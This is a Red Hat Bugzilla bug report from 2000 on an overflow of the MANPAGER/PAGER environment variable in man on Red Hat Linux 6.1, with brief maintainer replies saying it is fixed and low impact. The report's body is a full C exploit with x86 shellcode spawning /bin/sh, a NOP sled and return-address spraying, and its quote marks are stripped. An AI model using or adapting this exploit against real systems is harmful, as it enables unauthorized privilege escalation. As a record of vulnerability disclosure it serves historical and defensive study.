Bug 9892 - PAGER env variable can be overflowed...
Summary: PAGER env variable can be overflowed...
Keywords:
Status: CLOSED RAWHIDE
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: man
Version: 6.1
Hardware: i386
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Bernhard Rosenkraenzer
QA Contact:
URL:
Whiteboard:
: 10338 (view as bug list)
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2000-03-01 15:04 UTC by mathew
Modified: 2008-05-01 15:37 UTC (History)
0 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2000-03-01 15:50:35 UTC
Embargoed:


Attachments (Terms of Use)

Description mathew 2000-03-01 15:04:49 UTC
DOH!


/* * (c) 2000 babcia padlina / b0f * (lcamtufs idea) * * redhat 6.1
/usr/bin/man exploit*/
#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>
#define NOP 0x90
#define OFS 1800
#define BUFSIZE 4002
#define OFS 1800
#define BUFSIZE 4002
#define ADDRS 1000
long getesp(void){ __asm__(movl %esp, %eax\n);}
int main(argc, argv)int argc;
char **argv;
{ char *execshell =
\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b
\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd
\x80\xe8\xdc\xff\xff\xff/bin/sh;
 	char *buf, *p;
 int noplen, i, ofs;
 long ret, *ap;
 if(!(buf = (char *)malloc(BUFSIZE+ADDRS+1))) { perror(malloc()); return
-1; }
if (argc > 1) ofs = atoi(argv[1]); else ofs = OFS; noplen = BUFSIZE -
strlen(execshell); ret = getesp() + ofs; memset(buf, NOP, noplen);
buf[noplen+1] = \0; memset(buf, NOP, noplen); buf[noplen+1] = \0;
strcat(buf, execshell); p = buf + noplen + strlen(execshell); ap =
(unsigned long *)p; for(i = 0; i < ADDRS / 4; i++) *ap++ = ret; p = (char
*)ap; *p = \0; fprintf(stderr, RET: 0x%x len: %d\n\n, ret,
strlen(buf)); setenv(MANPAGER, buf, 1); execl(/usr/bin/man, man,
ls, 0)

Comment 1 Bernhard Rosenkraenzer 2000-03-01 15:50:59 UTC
This is fixed in the 2 most recent rawhide packages (1.5g-8 and 1.5h1-1).
It's not a serious problem though; at worst you can get setgid man, meaning you
can write to /var/catman.

Comment 2 Bernhard Rosenkraenzer 2000-03-25 02:35:59 UTC
*** Bug 10338 has been marked as a duplicate of this bug. ***


Note You need to log in before you can comment on or make changes to this bug.